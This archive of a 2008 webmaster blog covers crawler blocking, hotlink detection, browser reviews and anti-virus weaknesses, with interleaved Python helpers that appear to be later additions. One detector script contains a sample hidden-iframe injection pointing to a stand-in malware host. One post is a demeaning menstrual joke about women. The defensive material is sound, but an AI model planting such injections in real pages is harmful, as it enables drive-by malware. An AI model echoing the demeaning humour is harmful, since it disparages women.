Wednesday, December 24, 2008

Design With Screen Shots in Mind

With the proliferation of screen shots everywhere you would think that site designers would make sure that their sites make good screen shots, right?

Unfortunately this is not always the case.

When a surfer uses a visual search engine or a directory that has screen shots of the site, the visual appeal often dictates which site is chosen and which is left behind, not the SEO value of the text that got the site there in the first place.

Download a copy of WebShot and see how your site looks as a thumbnail.

If the resulting thumbnail doesn't convey an eye-catching concept of the site, you've failed.

More importantly, if the thumbnail comes up as a solid color because your Flash file is too slow to load and play in 30 seconds, or for some other technical reason, you've failed even worse.

One of my sites has almost 40K screen shots online and trust me when I tell you that the crap screen shots aren't getting the lion's share of the clicks. People just assume the site is broken or something and click elsewhere.

Hope this helps a few of you revise how you think of your home pages.

Sunday, December 07, 2008

How to Block SpyderMate SEO Tool

Trapped another SEO tool called SpyderMate that crawls your site analyzing data.

Nothing wrong with using it but don't let competitors get a free ride analyzing your site.

The spider details: []
"MentorMate Spider"

Their host:
OrgName: Slicehost LLC
NetRange: -

They just keep coming and eventually they'll run out of data centers we haven't blocked!

Friday, December 05, 2008

Top 20 Forum Spammers for 2008

So far this year I've been tracking 9,694 unique IPs attempting to spam 49,492 links on my sites and they all bounced into a spam tracking log file.

Using this log file I can track where all the crap is coming from and (not so) surprisingly it's primarily coming from Europe.

The #1 spam host is which wins the prize with 4 IPs in the top 20 and their #1 spammer at 7,798 posts is still trying today!

The runner up is which has a few prolific IPs and took the #2 and #10 positions.

7798 :
2327 :
2174 :
2156 :
1889 :
1603 :
1551 :
1541 :
1218 :
1085 :
1008 :
1003 :
599 :
560 :
459 :
437 :
434 :
413 :
379 :
194 :
Not a single spam got through but they just keep trying because they aren't that fucking smart.
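
For anyone wanting to build a similar leaderboard, here's a rough sketch of the tally in Python. The log format is purely an assumption (one attempt per line, source IP as the first field) since the actual spam tracking log isn't shown here, and the sample entries use documentation-only IP ranges, not real spammers.

```python
from collections import Counter


def top_spammers(log_lines, limit=20):
    """Count spam attempts per IP and return the busiest ones.

    Assumes a hypothetical log format: one attempt per line, with the
    source IP as the first whitespace-separated field.
    """
    counts = Counter()
    for line in log_lines:
        fields = line.split()
        if fields:  # skip blank lines
            counts[fields[0]] += 1
    return counts.most_common(limit)


# Made-up sample data using documentation-only IP ranges.
sample_log = [
    "192.0.2.10 http://spam.example/a",
    "198.51.100.7 http://spam.example/b",
    "192.0.2.10 http://spam.example/c",
    "",
    "192.0.2.10 http://spam.example/d",
]

for ip, attempts in top_spammers(sample_log):
    print(f"{attempts} : {ip}")
```

Swap in whatever field layout your own tracking log uses; the counting itself doesn't change.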

Wednesday, November 05, 2008

Temporarily Block HotLinking To Find Copyright Abusers

Blocking hotlinks is usually considered a method used to conserve bandwidth and stop leeching of images off your server. However, you can also use hotlink blocking to quickly and easily find all those sites using your content.

The most common solution for Linux servers is to add the following hotlink blocking code into your .htaccess file.

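RewriteEngine On
# Let requests with an empty referrer through (direct visits, some proxies)
RewriteCond %{HTTP_REFERER} !^$
# Let requests referred by your own site (any subdomain) through
RewriteCond %{HTTP_REFERER} !^http(s)?://(.*\.)?example\.com [NC]
# Everything else asking for an image gets a 403 Forbidden
RewriteRule \.(jpeg|jpg|gif|png)$ - [F]
Obviously you want to change the placeholder example.com to the domain name of your site before adding this to .htaccess on your site.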

Now once you've added this code the fun begins as you sit back for a few hours and wait for all the "403 forbidden" codes to start filling up your access log file.

Now a simple grep on your log file will generate a nice list of sites in the referrer field that are hotlinking your images, or doing something much worse, which is often the case.

grep "\.jpg" access_log | grep " 403 "

grep "\.gif" access_log | grep " 403 "
The first part of the grep locates all ".jpg" files then the second part filters out all but the " 403 " forbidden errors.
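
If you'd rather get a de-duplicated list of offending sites than eyeball raw log lines, here's a minimal Python sketch of the same idea. It assumes your server writes the Apache "combined" log format (referrer in the second-to-last quoted field); the sample lines and hostnames are made up for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Assumes Apache "combined" log format; adjust the pattern for other formats.
LINE_RE = re.compile(
    r'"(?:GET|HEAD) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
IMAGE_RE = re.compile(r"\.(?:jpe?g|gif|png)(?:\?|$)", re.IGNORECASE)


def hotlinking_hosts(log_lines):
    """Return a Counter of referrer hosts that got a 403 on an image request."""
    hosts = Counter()
    for line in log_lines:
        match = LINE_RE.search(line)
        if not match or match.group("status") != "403":
            continue
        if not IMAGE_RE.search(match.group("path")):
            continue
        # hostname is None for an empty or "-" referrer, so those are skipped
        host = urlparse(match.group("referer")).hostname
        if host:
            hosts[host] += 1
    return hosts


# Made-up sample lines in combined log format.
sample_lines = [
    '203.0.113.5 - - [05/Nov/2008:10:00:00 -0800] "GET /images/photo.jpg HTTP/1.1" 403 199 "http://scraper.example/page.html" "Mozilla/5.0"',
    '203.0.113.6 - - [05/Nov/2008:10:00:05 -0800] "GET /images/logo.gif HTTP/1.1" 403 199 "http://scraper.example/other.html" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Nov/2008:10:00:09 -0800] "GET /images/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [05/Nov/2008:10:00:12 -0800] "GET /index.html HTTP/1.1" 403 199 "http://other.example/" "Mozilla/5.0"',
]

for host, hits in hotlinking_hosts(sample_lines).most_common():
    print(f"{hits:6d}  {host}")
```

To run it against a real log, pass an open file instead of the sample list, e.g. `hotlinking_hosts(open("access_log"))`.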

After a day or 2 you'll have a nice list of sites to send C&Ds, DMCAs, and all sorts of fun stuff.

Now disable your hotlink blocking script or remove it from your .htaccess file.

Why disable hotlink blocking?

Because hotlink blocking encourages people to actually download your images, making the process of finding stolen images way more difficult. Therefore, a temporary hotlink block shows you everyone doing this just long enough to take corrective measures, then you leave your site wide open again and wait for the next batch of idiots to start hotlinking.

Hope a few of you find this little tip handy!

Monday, November 03, 2008

Pubcon '08 and Other Announcements

I'll be presenting at PubCon '08 on the topic of Competitive Intelligence. The only difference is the other panelists will be discussing how to find competitive intelligence while I'm telling people how to protect themselves from such research.

Also, keep your eye on this space:

All shortly upcoming announcements will be made via Twitter and there's a bunch coming up soon.

It's what you've been waiting for...

Thursday, October 30, 2008

JadynAve Bot Wants Your Local Data

If you have a bunch of local data like I do then you better protect it because JadynAve's Local Business Search appears to be coming after your site with their JadynAveBot!

Didn't ask for robots.txt, has no data whatsoever on their robot page except to email them if you have any questions, big whoop.

Here's the IP and user agent:
"Mozilla/5.0 (compatible; JadynAveBot; +"
I wouldn't bother trying to add them in robots.txt since they didn't ask for robots.txt.

This is a job for .htaccess!

A little research revealed they have also crawled without the "bot" in their user agent so you'll just want to block anything with "jadynave" in it.
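
The matching rule itself is simple enough to sketch in Python, say for a script-level bot blocker sitting in front of your pages. This is only an illustration of the case-insensitive "anything containing jadynave" check; the function and list names are made up, and the second user agent in the usage lines is a hypothetical example of the "no bot in the name" variant.

```python
# Substrings to refuse, compared in lowercase so case doesn't matter.
BLOCKED_AGENT_SUBSTRINGS = ("jadynave",)


def is_blocked_agent(user_agent):
    """Return True if the user agent contains any blocked substring."""
    ua = (user_agent or "").lower()
    return any(token in ua for token in BLOCKED_AGENT_SUBSTRINGS)


print(is_blocked_agent("Mozilla/5.0 (compatible; JadynAveBot; +"))  # with "bot"
print(is_blocked_agent("Mozilla/5.0 (compatible; JadynAve)"))       # hypothetical variant without "bot"
print(is_blocked_agent("Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/3.0.1"))
```

Matching on the shorter "jadynave" string is the whole point: it catches both variants without needing a separate rule for each.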

Tuesday, October 28, 2008

Suspected Copyright Offenses

Something amusing hit my site from from which appears to be or the German version of T-Mobile.

I see the following IP and user agent: "Verdacht Vergehen nach UrhG"
Which Google translates into:
Suspected offenses under the Copyright Act
Well isn't that just the cutest little user agent to get caught in a bot blocker?

Now I've had my chuckle for the evening, back to work...

Why Does Copyscape/GoogleAlert Hide?

Never really played around with Copyscape/GoogleAlert much but I noticed it tries to completely hide its presence when accessing a server, which isn't cool.

Not that I'm a fan of plagiarism as my copy of the DMCA is almost worn out from use, but I'm even less of a fan of sneaky web crawlers that pretend to be shit they aren't.

The IP that Copyscape uses: ->
The Copyscape user agent:
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This IP is located at Rackspace so if you're already blocking Rackspace then you probably won't be bothered with Copyscape in the first place:
inetnum: -
descr: Rackspace Managed Hosting
Of course you might not want to block this if you actually use Copyscape as it will become quite useless.

Monday, October 27, 2008

Viewzi's Meta Search Engine Taking Screenshots Without Permission

Here we go again with yet another visual search engine called Viewzi taking a bunch of screen shots without asking for permission from robots.txt.

In this case it's a meta search engine and technically the search engines Viewzi culls from have been given permission to crawl, but Viewzi itself was never given access permission.

Here's the Viewzi user agent:

Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b4pre) Gecko/2008022910 Viewzi/0.1
They appear to have just replaced the word Firefox with their user agent name Viewzi instead of just adding Viewzi to the agent, which is kind of crappy since it doesn't even give Firefox attribution for the code being used to make the screen shots.

Viewzi currently crawls from the "" range of IPs so if you're already blocking then you've blocked Viewzi already.

Sorry, but you won't get any Viewzi of my sites until you learn to play nice.

Saturday, October 25, 2008

Google Analytics Finds Bandits and Proxies!

Google Analytics has a Hostnames feature that most overlook which normally displays the hostname of the site your visitor landed on, like However, you'll probably notice a bunch of IP addresses and other interesting information in this list including sites that may have stolen your content!

To see what I'm referring to go into your Google Analytics account and go to Visitors -> Network Properties -> Hostnames.

Many of the IPs listed will be for Google or Yahoo translator services or such and you wouldn't want to block any of these. Other IPs and host names will be proxy servers in data centers you probably never heard of and possibly host names to places that have your stolen content posted!

Now expand the date range for your report to show all your Hostname data as far back as Google has been tracking your site and see what people have been doing with your site all this time.

It's probably not worth trying to block old single proxy IPs since proxy sites come and go all the time. However, you'll most likely find these IPs are associated with data centers which host lots of servers, and perhaps that proxy has just moved to a new IP, so now you have another data center you can block.
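
Checking an IP from that Hostnames list against the data center ranges you already block is easy to script. Here's a minimal sketch using Python's standard ipaddress module; the ranges are documentation-only placeholders standing in for real data center allocations, which you'd look up yourself via whois.

```python
import ipaddress

# Hypothetical blocklist: documentation-only ranges standing in for data centers.
BLOCKED_RANGES = [
    ipaddress.ip_network(cidr)
    for cidr in ("192.0.2.0/24", "198.51.100.0/24")
]


def in_blocked_range(entry):
    """Return True if entry is an IP address inside any blocked range.

    Entries that aren't IP addresses (e.g. real host names from the
    Hostnames report) simply return False.
    """
    try:
        addr = ipaddress.ip_address(entry)
    except ValueError:
        return False
    return any(addr in network for network in BLOCKED_RANGES)


for entry in ("192.0.2.77", "203.0.113.9", "stolen-content.example"):
    status = "already blocked" if in_blocked_range(entry) else "needs a look"
    print(f"{entry}: {status}")
```

Anything that comes back as "needs a look" is a candidate for a whois lookup and possibly a new range on the list.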

Fun fun fun!

The list of actual host domain names, not the IPs, is what I found most useful as a few of those turned out to be idiots that managed to scrape a page or two from my site and still had my Google Analytics tracking codes on their pages!
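
Once you have a suspect page saved, confirming it still carries your tracking code takes a few lines. This sketch assumes the classic "UA-number-number" account ID format and works on HTML you've already downloaded; the ID and the HTML snippet are made up.

```python
import re

# Classic Google Analytics account IDs look like UA-1234567-1.
TRACKING_ID_RE = re.compile(r"\bUA-\d{4,10}-\d{1,4}\b")


def tracking_ids(html):
    """Return the set of Analytics account IDs found in a page's HTML."""
    return set(TRACKING_ID_RE.findall(html))


def carries_my_code(html, my_id):
    """Return True if the page still contains my tracking ID."""
    return my_id in tracking_ids(html)


MY_ID = "UA-0000000-1"  # hypothetical ID, replace with your own

scraped_html = """
<html><body>Scraped article text...
<script type="text/javascript">
_uacct = "UA-0000000-1";
urchinTracker();
</script>
</body></html>
"""

print(carries_my_code(scraped_html, MY_ID))
```

A hit is pretty hard for the scraper to explain away, which makes it handy evidence to attach to the C&D.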

Enjoy this new toy while I start sending C&Ds to the idiots with my tracking codes still on their sites.

Monday, October 13, 2008

Possibly Slowest Scraper Ever

I've seen slow scrapers before but this is fucking ridiculous. has been automatically challenged to answer now 227 times since 09/23/2008 and it just keeps plugging along slow enough to be off the radar of most webmasters but just fast enough it keeps nudging my bot blocker once a day to keep tracking it.

The user agent claims to be Firefox 3:

Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv: Gecko/2008070208 Firefox/3.0.1
Which could indicate someone making screen shots.

No clue what they're really doing but it's going really slow and they're getting pages of garbage instead of what they want, so I hope they're having a real good time fucking with my bot blocker.

Thursday, October 09, 2008

SEOMoz's New Linkscape Creates Webmaster Backlash

10/06/08 - A day that will live in internet infamy when a prominent internet company caught millions of webmasters off guard and sent shockwaves around cyberspace.

The event that caused this uproar was the launch of Linkscape with supposedly 30 billion pages indexed that stunned even the most savvy webmasters because they didn't see it crawling and were totally taken by surprise.

This new snooping SEO tool is billed as "An Index of the World Wide Web – 30 billion pages (and growing!), refreshed monthly" which has left webmasters that are already battered and abused by a massive onslaught of automated bots more angry than ever.

The internet entitlement mentality thinks that all webmasters have unlimited bandwidth and CPU and that anything that's online should just be taken without regard to the consequences.

Webmasters will no longer tolerate Indexation Without Representation and are moving to regain control over their sites, their content, and their competitive intelligence. Many webmasters that previously called bot blockers paranoid draconian control freaks are now crying for solutions to high profile marauders raiding their sites and reaping large profits. Now that the tide has turned the webmasters are preparing for the revolution with new sites such as the NoArchive Initiative, better bot blocking scripts, honey pots and much more.

Even a competitive site called MajesticSEO, which provides a similar product, actually gives free multi-page reports on your domains if you register and prove you own the site, which is at least a symbiotic relationship and not completely parasitic.

However, not only does Linkscape give nothing back to webmasters for allowing their sites to be crawled, or mined for competitive intelligence, they actually increased the price $30 to access their tools so you have to pay more for the privilege of being crawled to see your own data!

New Pricing, featuring three levels of PRO membership depending on the size and needs of our members. Current PRO members need not worry - you'll be grandfathered in at the current price level. We're just creating two new echelons for those who need access to more. If you'd like to lock in at the current price level ($49/month), I won't stop you :-)
So what benefit do we all get from all this?

For a monthly fee our competitors can see everything we do in infinite detail.

Wow! That's a benefit?

Sorry, but that just doesn't play homey.

Wednesday, October 08, 2008

Vote for the Best Tattoo - Neil Patel vs. IncrediBILL

Neil Patel has been making some noise about a lady friend getting his name tattooed on her lower back as the ultimate sign of success.

Not to be outdone, one of my bot blocking fan girls stepped up to the ink for this IncrediBILL asstravaganza tattoo.

So which is the best tattoo?

You be the judge!

Thursday, September 11, 2008

Exploring The Tynted Web

Here we go with Tynt, yet another startup trying to socialize the web.


Yesterday there was a little bit of a flap about Tynt as they're running a wide open proxy on that allows page hijacking in the search engines.

Today Tynt responded on their blog to the SEO community.

First, we understand that Tynt has the potential to impact the major search engines in ways that were detrimental to the sites being Tynted. Our community recommended blocking spiders from crawling Tynts through the use of a Global Robots Exclusion file (robots.txt) as well as other techniques to minimize the problem. We have already implemented the ROBOTS.TXT file and are working on additional solutions.
That's a noble effort but now anyone running AdSense, YPN or any other contextual network ads is shit out of luck because the ad network's bot has to visit the page to serve up the ads. This turns out to be a moot point because allowing the bot also makes the ads go to shit for other reasons explored below.

I think Tynt is missing the point that their proxy server is wide open and can be used by scrapers and other online vermin to access your site even though they might be blocked by other means.

Here, try it with Google or Yahoo or whatever you want, wide open and works for anyone and is ripe for abuse including phishing expeditions, very nice.

Shouldn't that proxy only work for registered members that are currently logged in?

Just a thought, I know it's beta and you want to demo some pages, but put a unique key in the URI so that only pages requested by actual Tynt members work with the proxy and it can't be randomly exploited.

For instance, instead of allowing the raw path "" maybe it should be "".
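
To be clear about what I mean by a unique key, here's a rough Python sketch of one way to do it: sign the member ID and target URL with a server-side secret (HMAC) and refuse any proxy request whose key doesn't verify. This is my own illustration, not anything Tynt has published; the secret, member ID, and function names are all hypothetical.

```python
import hashlib
import hmac

# Hypothetical server-side secret; never sent to the browser.
SECRET_KEY = b"replace-with-a-long-random-secret"


def member_key(member_id, target_url):
    """Derive the key a logged-in member gets for one specific target URL."""
    message = f"{member_id}|{target_url}".encode("utf-8")
    return hmac.new(SECRET_KEY, message, hashlib.sha256).hexdigest()


def is_valid_request(member_id, target_url, key):
    """Return True only if the key matches this member and this URL."""
    expected = member_key(member_id, target_url)
    # compare_digest avoids leaking how many characters matched
    return hmac.compare_digest(expected.encode("utf-8"), key.encode("utf-8"))


key = member_key("member42", "http://www.example.com/")
print(is_valid_request("member42", "http://www.example.com/", key))        # key issued for this page
print(is_valid_request("member42", "http://www.example.com/other", key))   # same key, different page
print(is_valid_request("member42", "http://www.example.com/", "bogus"))    # made-up key
```

Because the key is tied to both the member and the page, a scraper can't just lift one working URL and rewrite it to fetch whatever it wants.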

BTW, pass through the actual end user in your HTTP_X_FORWARDED_FOR field as we don't really find the NAT addresses of your internal servers all that useful.

Moving right along...

On their Twitter bio it says:
Tynt lets you put contextual relevance and dialog on web pages for sharing and interaction.
Listen, if I want dialog on my web pages, I'll put a comments section on the bottom of the pages, I don't need or want your help in this matter.

They clarify this further on the Tynt FAQ page:
Q. What kind of 'stuff' can I put on top of a web page?
A. There is a bunch of different things that you can do to a web page ranging from tools for research like sticky notes and highlighting text, to more fun stuff like text, speech bubbles, graphics and animations. Tynt is a fabulous tool for in context editorializing; in other words, Tynt lets you say what you think right on top of the topic you are talking about.
Let's see, what does putting things on top of a web page mean? Vandalism, graffiti and lampooning quickly come to mind, something every business online welcomes. Several examples on their site actually show exactly this so no thanks, I think I'll keep my site out of your "stuff".

Wait, it gets even better, we get to foot the extra bandwidth bill for the privilege of letting the Tynt users download our pages just to draw horns and funny faces on our site. Fuck that.

Besides, if you Tynt a blog, forum, or twitter you're actually taking away from the value of those social mediums by breaking up and disjointing the conversation into multiple places which adds no value to the original discussion.

Here's another precious gem from the Tynt FAQ page:
Q. Does Tynt steal my traffic and therefore my revenue?
A. All Tynted web pages, including images, ads and other media all load live from the originating web server so every time a Tynt is viewed the Tynted web site get the ad revenue and traffic.
Holy misconception and major bullshit alert Batman!

Anyone using a context sensitive advertising medium like AdSense and YPN will be in trouble. This is because AdSense and YPN don't know their context in relationship to the domain name, so they show a bunch of off topic garbage which won't interest the person viewing the page whatsoever.

Want proof?

Let's use a Google AdSense case study site called CoolChaser just to see how well the ads work before and after you run the site through Tynt.

The results we saw were priceless:

Gay Bears Chat anyone?

That's just what my visitors crave, they love big hairy men that like other big hairy men and just can't keep their hands off of them - NOT.

As a matter of fact, something like this happening on a family friendly website could cause a huge problem but we won't delve into those issues at the moment.

Sorry, nothing about your Beta causes this problem as this is how AdSense responds over most any proxy and even in their own cache pages so anyone relying on AdSense or YPN revenue that has traffic redirected through Tynt's proxy will probably just lose out.

One of the Tynters tweeted me:
iancheung @IncrediBILL Tynt drives more people to sites and since people make money by ad views, it actually increases revenue.
I don't see how increased revenue is possible since you can't even see the ads because they're covered up with all those goddamn sticky notes!

From the blog:
Second, site owners have requested the ability to opt-out of having their sites publicly Tynted. We’ve given this a great deal of thought...
I gave it 2 seconds of thought and blocked your IP ranges:
Tynt Multimedia Inc. (TYNTM) - -
Out of site, out of mind, not a problem.

But wait, they have more in store:
The reason for the gateway (and the different looking URL) is to allow us to insert the JavaScript which loads the Tynt engine for the in-context comments and conversations (and hey, if everyone installs the plug in, then there is no need for our gateway and we can save ourselves the bandwidth and effort there too!).
The end users will be doing the page loading and we'll be unable to see them or stop them from fucking with our pages.

Many webmasters take their livelihoods and reputations very seriously and don't like being fucked with so there needs to be a way to detect the use of Tynt and or a way to opt-out of Tynt before this happens or it could get very ugly.

Last but not least, Tynt has made no mention of how they plan to make money.

Do you ultimately plan on using our sites to trigger your ads?

That's when the shit will really hit the fan.

Have a nice week.

Sunday, September 07, 2008

2008 a Chrome Odyssey

Did Stanley Kubrick join Google marketing?

Ever since Chrome was released it's been like watching the online monkeys beat the monolith with bones like the intro of 2001: A Space Odyssey.

Sometimes people just make me want to smack them upside the head the way Gibbs dishes it out to DiNozzo on NCIS.

First, Google releases a beta product and everyone starts reviewing it like it's a finely polished shipping product. For those of you not in the software business, there are various levels of beta which typically evolve into a final beta, meaning that all features are frozen for that release. Then comes a beta gold candidate which appears to be as bug-free as possible and is about to become a shipping product. The initial release of Chrome is obviously a real beta that they want feedback on, so get over it. It's an early beta, nowhere close to a final beta IMO, but it's a damn good first release.

Second, a whole bunch of people are trying to steal Google's thunder comparing it to MSIE 8 primarily, which is also still in beta. If Google didn't already have those features coded then they wouldn't be in their initial beta either. It's not like someone at Google woke up on a Monday, read the MSIE 8 feature list, and wrote a whole bunch of new features for Chrome that just showed up in the release on Tuesday, get real. Most of those features were obviously in the works for quite some time but MSIE 8 was publicly known, as opposed to the closely held secrets of Chrome.

Thirdly, it's mostly just desperate cries for attention and link bait from people that have nothing better to do than bash Google on a good day, and now there's more fuel for the fire.

Just remember, the first version of Firefox wasn't much to write home about, which was initially distressing considering its Netscape heritage, but it got better in a hurry until they bloated up Firefox 3, what a slug.

Additionally, Chrome is built on the same rendering engine that runs Safari so it has a lot of history already and should be pretty solid except for its handling of some plug-ins, which will be fixed.

Overall, I'm hopeful that Chrome gets the bugs patched quickly because I love the speed and snappy page displays like you get with Opera without all the javascript quirks.

I just hope it ships with add-on capability or more javascript control like Firefox's NoScript and I'll be a happy boy.

Remember people, it's JUST BETA, give them a chance to polish it up.

Tuesday, September 02, 2008

Chrome Shines While Fat Lady Sings for Opera, Firefox and MSIE

I'm very hard to impress, an old school hard core programmer that detests software bloat from lazy assed programmers using poorly implemented cross-platform development environments.

I like fast and lean code, shit that makes an old laptop look all shiny and new and maybe that's why Google named their new browser chrome cause this fucker shines.

It was only yesterday that I threw my hands up in the air and ran screaming from Firefox 3's latest fat, bloated leaky slower than shit browser and declared Opera was one hell of a fast alternative.

Unfortunately, for all of Opera's speed there were a few quirks that meant it wasn't a 100% solution after all, starting with the fact that some javascript in Horde Webmail (used in Plesk) had a few problems so it was only 95% usable. Still workable and not a show stopper.

The show stopper was that Opera's copy & paste was unable to properly render text to an HTML editor, as the full HTML content that had been copied from a web page was stripped down to plain text. Plain text is expected when you paste into something like Notepad, but not when you paste into an application that's capable of negotiating the data type and wishes to receive the full HTML content from the browser.

For us old school Windows programmers this is CLIPBOARD 101 kind of shit and Opera failed the class miserably.

Guess what?

Google Chrome in BETA didn't have the javascript glitches in Horde Webmail and it knows how to properly paste HTML text, something Opera has had years to perfect.

Both Opera and Chrome are fast but the devil is in the little details and so far Chrome is in league with the devil.

OK, Chrome doesn't ship with Java, appears to crash with Quicktime (who gives a shit besides Apple and all their cultists) and has a few other plug-in problems, but for a BETA it's fucking phenomenal, it's DA BOMB!

Although I have to ask Google one simple question:

Where's the goddamn TITLE bar and the STATUS bar?

Don't make me drive down to Mtn. View and teach you Windows 101 coding, come on, these should've been there from the get go.

Other than that little peeve, and the lack of security control given by Firefox add-ons like NoScript, I'm totally stoked. I'll cut Google some slack and assume they'll remedy the missing title and status bar, include Java, fix the Quicktime crash, etc. and provide more control over javascript.

Google, a damn fine first showing, hats off, kudos, just fix the rest of this and I'm a solid Chromer for life.

BTW, I'm posting this using Google Chrome so this fucker does work.


Monday, September 01, 2008

Opera 9.5 Smokes Firefox 3

The latest Firefox 3 upgrade was just pitiful: the memory footprint was fatter, it seemed to be leaking memory, and page loads just crawled at a snail's pace. It was an overall hog.

The options were limited:

- Go back to MSIE 7, which isn't much better, or

- Give Opera one last try as I've always found something that stopped me from using Opera in the past.

Well, the first thing I noticed is Opera 9.5 is faster than shit and loads some pages 3x-5x faster than Firefox, especially my own blog which makes Firefox choke. The second thing I noticed was the footprint of Opera 9.5 is about half that of Firefox when it loads and operates.

Seriously, Opera loaded pages so much faster than Firefox it felt like I was using a new computer!

So now I'm going to give Opera a try and see if there are any gotchas that will stop me from using it but so far it's looking really good and I may just be the next Opera convert!

BTW, this blog post is my first in Opera!

Sunday, August 31, 2008

MJ12BOT's Dirty Little Secret

Many of you have seen MJ12bot hammering your site from IPs all over the world, both the legit crawler and the fake virus version 1.0.8 as well.

"Mozilla/5.0 (compatible; MJ12bot/v1.2.3;"
Everyone likes an underdog and we tolerate these crawlers when they claim such a noble purpose:
We do spider the Web for the purpose of building a distributed search engine with fast and efficient downloadable distributed crawler that will enable people with broadband connections to help contribute to, what we hope, will become the biggest search engine in the world.
It's been crawling for years and I've never seen any traffic from this damn thing, has anyone?

Then the "offshoot" of this so-called search engine emerges, which is Majestic SEO, which claims to be "a commercial offshoot from Majestic-12".

What do they do with the data gathered when they crawl your site?

Here's a direct quote, including typos and bad grammar:
competitive reports are now avaialble, you can buy credits and then use them to see information any domain!
So let's get this right, if we let you crawl our server then you'll let our competitors buy information that can be used against us?

We have a simple solution to this distributed problem:
RewriteCond %{HTTP_USER_AGENT} MJ12bot
RewriteRule .* - [F]
Compete with that.

FireFox 3 Bloated Leaky Pile of Shit

Firefox 3 with all its much anticipated upgrades turned out to be a big fat flop that's annoying me to the point I'm thinking of switching back to Internet Explorer or giving Opera a try.

Some of the new features seem interesting but overall it's slower, bloated, and appears to be leaking faster than the Titanic after a close encounter with an ice cube.

The damn thing starts at about 40MB and just grows and grows.

Here I'm sitting with a lousy 2 tabs open after using it for a while and it's holding 100MB of memory and not releasing it.

Maybe it's one of the 2 plug-ins I'm using causing the leaks, who knows, but this hog is almost intolerable as it just grows and grows.

Ah well, you gave it a good run Mozilla, time to look elsewhere.

Sunday, August 24, 2008

Woman Weather Channel

During a discussion with a few of my male friends today it became obvious that some of us could benefit from such an online service.

You could have a widget, perhaps a Google Gadget even, sitting on your desktop that declares your woman's current menstrual state such as:

Today: Slightly Spotty
Then you could click on the widget and look at the 5 day forecast and see what's in store for the week:
Mon: Spotty
Tue: Heavy Flow
Wed: Flow
Thu: Spotty
Fri: Clear
Obviously the paid version I'm tentatively calling "Wife Alert" could also send potentially life saving text messages to your cell phone at appropriate times.

It's 6am on that fateful morning when the text message alarm chirps:
Perhaps even an advance warning system with even more important information such as converging events that could spell disaster if you fuck up.
Considering how much physical and mental abuse this could potentially save men, it's even possible your health insurance company would pick up the tab for "Wife Alert" as a standard health benefit.

Just like how the weather channel allows you to look up the weather of other locations around the world, the Woman Weather Channel would allow you to look up celebrities online.

Could you imagine tuning in to watch The View when you knew two of the hosts were going to have a bad day at the same time?

The Woman Weather Channel could also be an indispensable resource for anyone in business or politics that could simply avoid any bosses, colleagues or co-workers known to be having a "bad day" until her weather report showed all clear.

The possibilities are endless so tune into the Woman Weather Channel today and all you husbands subscribe to "Wife Alert" as it could be your life it saves!

Thursday, August 14, 2008

How Flawed is Your Anti-Virus?

Some of the anti-virus web surfing protection products are permitting some very risky behavior due to flaws in their basic design. For instance, some of them allow your browser to willingly go to known bad locations they have in their database until something catastrophic gets downloaded. Once the file is downloaded it might be too late so there's the real problem.

Here's a quick for instance, the site "" was found in an Invisible IFrame launcher yet the page with that code was deemed safe. However, when you go to, which you should NOT go to as it's very bad, downloads a wide variety of things or randomly redirects you to Google of all places. That redirect to Google is probably tossed in there to throw people off the path trying to figure out if this is the source of the virus, but that's another story.

Anyway, several anti-virus and link scanning products just ignored the fact that this site is known to be bad and let me visit these pages without so much as a warning. Better yet, when I fed some infected pages directly into my browser just to see what happened, they couldn't detect the Invisible IFrame launcher script properly, and even when they did, didn't stop me from running the page at that time or even pop a warning!


Because, like many other malware sites, wasn't downloading a bad file at that particular instance. However, a few minutes later the malicious files were flowing from again and then the anti-virus woke up, finally.

Shouldn't the fact that downloads any malware be enough of a reason to set off some alarms and stop people dead in their tracks from going there?

Apparently not.

It appears that hackers have a leg up on spoofing the malware scanning software and the anti-virus developers so it's no wonder that machines are getting hacked all over the place.

Although the anti-virus products do add some value to protecting surfers they unfortunately cause more harm than good by giving a false sense of security. With the massive gaping holes in their technology the only true way to surf safely is using NoScript since no javascript whatsoever means no Invisible Iframe launcher tricks.

I'm not going to name which anti-virus products I tested at this time because I'd like to give them time to fix their products before exposing their shoddy methodologies and putting their customers at risk of being more of a target than they already are.

Come on anti-virus writers, get your shit together before I lose my shit and do a real expose!


The one interesting twist in the Invisible Iframe launcher script that I found this time is that it was injected into a common javascript file shared site wide instead of just being inserted into the home page. This is a nasty strategy twist that gives the hackers a bigger bang for their buck by getting more infected pages with a lot less work and the code isn't in the HTML file which is where most people would look first.
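
If you want to sweep your own shared javascript files for this kind of injection, here's a crude Python heuristic. It only flags plainly written iframe tags that are sized to 0 or 1 pixels or hidden with CSS; it's my own sketch, not how any anti-virus product works, and obfuscated or encoded payloads will sail right past it. The sample strings and the malware.example host are made up.

```python
import re

# Any iframe tag, whether in HTML or inside a javascript string.
IFRAME_TAG_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)

# Hints that the iframe is meant to be invisible.
HIDDEN_HINT_RE = re.compile(
    r"""(?:width|height)\s*=\s*\\?["']?[01](?:px)?(?![\d.%])"""
    r"""|display\s*:\s*none"""
    r"""|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)


def suspicious_iframes(text):
    """Return iframe tags in text that look deliberately hidden."""
    return [
        tag for tag in IFRAME_TAG_RE.findall(text)
        if HIDDEN_HINT_RE.search(tag)
    ]


# Made-up example of a shared .js file with an injected launcher at the end.
infected_js = (
    "function initMenu() { /* legit site code */ }\n"
    "document.write('<iframe src=\"http://malware.example/x\" "
    "width=0 height=0></iframe>');"
)
clean_html = '<iframe src="/map.html" width="600" height="400"></iframe>'

print(suspicious_iframes(infected_js))
print(suspicious_iframes(clean_html))
```

Run it over every .js file on the site, not just the HTML, since the shared script is exactly where this batch of hackers hid their code.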

Thursday, July 24, 2008

SEO Community in TailSphinn

I tried to support Sphinn's efforts by putting the SphinnIt button on my site to help raise awareness of what they were trying to do with something unique for the SEO community.

